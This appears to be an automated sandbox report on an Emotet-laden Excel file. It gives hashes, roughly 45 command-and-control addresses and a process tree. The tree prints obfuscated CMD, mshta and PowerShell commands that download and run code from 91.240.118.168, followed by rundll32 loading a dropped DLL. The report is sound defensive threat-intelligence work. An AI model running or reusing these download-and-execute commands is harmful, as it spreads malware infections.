Analysis
-
max time kernel
64s -
max time network
58s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 03:24
Behavioral task
behavioral1
Sample
2022-1-28-a43f25c31c035e3914ec0034f5c9fb07.xls
Resource
win7-en-20211208
General
-
Target
2022-1-28-a43f25c31c035e3914ec0034f5c9fb07.xls
-
Size
46KB
-
MD5
a43f25c31c035e3914ec0034f5c9fb07
-
SHA1
2d691e4ca3a1dce9db2d997554aadc7f8320c944
-
SHA256
79d708ce28a18ccaeffa88968dbebb4f5bdbde87f7bf9f5f2237b42db2bbac10
-
SHA512
32025211fc94f108cd512b585849df104a6523d1bd1a16cad95b18748126528c39f8c42dd9c2bf36875c5310fb2dd6802189c34839cb4b96664735244442e07e
Malware Config
Extracted
http://91.240.118.168/vvv/ppp/fe.html
Extracted
http://91.240.118.168/vvv/ppp/fe.png
Extracted
emotet
Epoch4
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 428 2700 CMD.EXE EXCEL.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid process 40 4088 mshta.exe 43 408 powershell.exe 45 408 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1208 rundll32.exe 3784 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2748 4088 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2700 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
WerFault.exepowershell.exepid process 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 2748 WerFault.exe 408 powershell.exe 408 powershell.exe 408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WerFault.exepowershell.exedescription pid process Token: SeDebugPrivilege 2748 WerFault.exe Token: SeDebugPrivilege 408 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE 2700 EXCEL.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exedescription pid process target process PID 2700 wrote to memory of 428 2700 EXCEL.EXE CMD.EXE PID 2700 wrote to memory of 428 2700 EXCEL.EXE CMD.EXE PID 428 wrote to memory of 4088 428 CMD.EXE mshta.exe PID 428 wrote to memory of 4088 428 CMD.EXE mshta.exe PID 4088 wrote to memory of 408 4088 mshta.exe powershell.exe PID 4088 wrote to memory of 408 4088 mshta.exe powershell.exe PID 408 wrote to memory of 3960 408 powershell.exe cmd.exe PID 408 wrote to memory of 3960 408 powershell.exe cmd.exe PID 3960 wrote to memory of 1208 3960 cmd.exe rundll32.exe PID 3960 wrote to memory of 1208 3960 cmd.exe rundll32.exe PID 3960 wrote to memory of 1208 3960 cmd.exe rundll32.exe PID 1208 wrote to memory of 3784 1208 rundll32.exe rundll32.exe PID 1208 wrote to memory of 3784 1208 rundll32.exe rundll32.exe PID 1208 wrote to memory of 3784 1208 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-a43f25c31c035e3914ec0034f5c9fb07.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\mshta.exemshta http://91.240.118.168/vvv/ppp/fe.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD5⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer7⤵
- Loads dropped DLL
PID:3784 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4088 -s 16684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
4be9fda9a2fdb10c36a1ce820b676e7e
SHA1fd74db40bdbc55c29ec996f32d7b7332088f32b2
SHA256f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
SHA512878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed
-
MD5
4be9fda9a2fdb10c36a1ce820b676e7e
SHA1fd74db40bdbc55c29ec996f32d7b7332088f32b2
SHA256f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
SHA512878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed
-
MD5
4be9fda9a2fdb10c36a1ce820b676e7e
SHA1fd74db40bdbc55c29ec996f32d7b7332088f32b2
SHA256f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1
SHA512878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed